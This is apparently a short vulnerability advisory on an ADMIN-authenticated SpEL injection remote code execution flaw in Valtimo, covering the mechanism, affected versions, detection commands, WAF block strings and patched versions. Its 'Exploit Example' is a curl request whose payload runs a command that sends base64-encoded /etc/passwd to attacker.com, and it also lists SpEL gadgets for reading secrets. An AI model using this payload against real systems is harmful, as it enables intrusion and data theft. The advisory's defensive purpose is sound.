Listen to this Post
How the Mentioned CVE Works
Multiple classes in Valtimo evaluate Spring Expression Language (SpEL) expressions from user-supplied input using StandardEvaluationContext. Unlike the safer SimpleEvaluationContext, `StandardEvaluationContext` provides unrestricted access to all Java types and methods, allowing expressions to reach and interact with Java classes such as java.lang.Runtime.
A remote attacker who is authenticated with the ADMIN role can exploit this by crafting malicious SpEL expressions and injecting them via two vulnerable mechanisms: the `DocumentMigrationService` and the `Condition` framework.
For `DocumentMigrationService` (affected since version 12.0.0), the exploit is delivered through the document migration REST API by sending a POST request to `/api/management/v1/document-definition/migrate` or /api/management/v1/document-definition/migration/conflicts. The attacker includes a malicious SpEL expression in the `source` or `target` field of a `DocumentMigrationPatch` object in the request body, using the `${…}` template syntax. The system then passes this unvalidated input to the `handleSpelExpression` method, which evaluates it with StandardEvaluationContext.
Since `StandardEvaluationContext` allows the expression to execute arbitrary code, an attacker could use `T(java.lang.Runtime).getRuntime().exec(‘…’)` to run system commands, `T(java.lang.System).getenv()` to exfiltrate all environment variables (including database passwords and API keys), `T(java.lang.System).getProperties()` to read JVM system properties, or `T(java.lang.Class).forName(‘…’)` to load arbitrary Java classes. This effectively grants the attacker the ability to take full control over the server.
The `Condition` framework (affected since version 13.4.0) presents an even larger attack surface, as it is used across many modules such as admin-configured widgets and dashboards. In this case, the attacker supplies the malicious SpEL expression in the `value` field of a condition’s JSON configuration, which is then processed by the `ConditionresolveValue` method.
DailyCVE Form
Platform: Valtimo
Version: 12.0.0 – 12.31.0 / 13.0.0 – 13.22.0
Vulnerability: ADMIN SpEL RCE
Severity: Critical
Date: 2026-05-06
Prediction: 2026-08-01
What Undercode Say:
Analytics:
- Log all POST requests containing `${…}` in `source` or `target` fields.
- Monitor for the execution of unexpected system processes or netcat reverse shells.
- Detect unusual API calls to internal endpoints by the Valtimo application service account.
Bash Command:
Scan logs for potential exploitation grep -E "POST \/api\/management\/v1\/document-definition\/(migrate|migration\/conflicts)" /var/log/valtimo/access.log | grep -E "T(java.lang.Runtime)" Check for outbound network connections initiated by the Java process lsof -p $(pgrep -f valtimo) | grep TCP | grep ESTABLISHED
Exploit Example:
curl -X POST https://victim.com/api/management/v1/document-definition/migrate \
-H "Authorization: Bearer $ADMIN_TOKEN" \
-H "Content-Type: application/json" \
-d '{"source":"${T(java.lang.Runtime).getRuntime().exec(\"curl attacker.com:8000?$(cat /etc/passwd | base64 -w0)\")}","target":""}'
Protection:
Apply patches 12.32.0 or 13.23.0 immediately. If patching is delayed, consider removing the `ADMIN` role from untrusted users, restricting network access to the vulnerable REST API endpoints, or implementing a Web Application Firewall to block requests containing `T(java.lang` or ${T(.
Impact:
An attacker with ADMIN credentials can completely compromise a Valtimo server, exfiltrating environment variables containing secrets such as database passwords and API keys. The attacker may also pivot deeper into the internal network or gain persistent access to the system through a reverse shell.
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode
